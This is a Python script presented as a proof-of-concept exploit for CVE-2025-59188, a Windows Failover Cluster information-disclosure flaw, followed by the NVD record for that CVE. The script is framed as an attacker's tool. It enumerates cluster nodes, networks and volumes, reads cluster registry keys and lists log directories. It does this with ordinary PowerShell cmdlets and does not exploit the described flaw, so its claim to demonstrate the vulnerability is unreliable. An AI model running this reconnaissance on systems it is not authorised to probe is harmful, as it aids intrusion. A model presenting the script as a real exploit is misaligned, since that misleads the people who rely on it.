CVE-2025-59188

# CVE-2025-59188 - Windows Failover Cluster Information Disclosure PoC (Conceptual) # This is a conceptual PoC demonstrating how an attacker with low-privilege # local access might attempt to enumerate sensitive cluster information. import subprocess import os import sys def check_cluster_service(): """Check if Failover Cluster service is running on the target system.""" try: result = subprocess.run( ["sc", "query", "clussvc"], capture_output=True, text=True, timeout=10 ) if "RUNNING" in result.stdout: print("[+] Failover Cluster service is running.") return True else: print("[-] Failover Cluster service is not running.") return False except Exception as e: print(f"[-] Error checking cluster service: {e}") return False def enumerate_cluster_info(): """Attempt to enumerate cluster configuration and sensitive information.""" # Method 1: Using PowerShell to query cluster information ps_commands = [ # Query cluster nodes and their status "Get-ClusterNode -ErrorAction SilentlyContinue | Select-Object Name, State, NodeWeight", # Query cluster resources "Get-ClusterResource -ErrorAction SilentlyContinue | Select-Object Name, ResourceType, OwnerGroup, State", # Query cluster networks "Get-ClusterNetwork -ErrorAction SilentlyContinue | Select-Object Name, Address, AddressMask", # Query cluster shared volumes "Get-ClusterSharedVolume -ErrorAction SilentlyContinue | Select-Object Name, SharedVolumeInfo", ] for cmd in ps_commands: try: result = subprocess.run( ["powershell", "-Command", cmd], capture_output=True, text=True, timeout=15 ) if result.stdout.strip(): print(f"[+] Cluster info retrieved via PowerShell:") print(result.stdout) except Exception as e: print(f"[-] Error executing PowerShell command: {e}") def access_cluster_registry(): """Attempt to read sensitive information from cluster registry keys.""" registry_paths = [ r"HKLM:\Cluster", r"HKLM:\SYSTEM\CurrentControlSet\Services\ClusSvc", r"HKLM:\SYSTEM\CurrentControlSet\Services\ClusDisk", ] for path in registry_paths: try: result = subprocess.run( ["powershell", "-Command", f"Get-ChildItem -Path '{path}' -ErrorAction SilentlyContinue | Format-List"], capture_output=True, text=True, timeout=10 ) if result.stdout.strip(): print(f"[+] Registry data from {path}:") print(result.stdout) except Exception as e: print(f"[-] Error accessing registry {path}: {e}") def read_cluster_logs(): """Attempt to read cluster diagnostic logs that may contain sensitive data.""" log_paths = [ r"C:\Windows\Cluster\Reports", r"C:\Windows\Logs\Cluster", ] for path in log_paths: if os.path.exists(path): print(f"[+] Found cluster log directory: {path}") try: files = os.listdir(path) for f in files[:5]: # List first 5 files print(f" - {f}") except PermissionError: print(f"[-] Permission denied for {path}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-59188 - Windows Failover Cluster Info Disclosure") print("=" * 60) if check_cluster_service(): print("\n[*] Attempting cluster information enumeration...") enumerate_cluster_info() print("\n[*] Attempting registry access...") access_cluster_registry() print("\n[*] Checking cluster log directories...") read_cluster_logs() else: print("\n[-] Target does not appear to be a cluster node.") print("\n[*] PoC execution completed.")

{"cve": {"id": "CVE-2025-59188", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:57.360", "lastModified": "2025-11-05T21:07:50.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows Failover Cluster allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "7A8CC16F-8B44-4E7D-8503-25D753387345"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "72C1771B-635B-41E3-84AF-8822467A1869"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59188", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}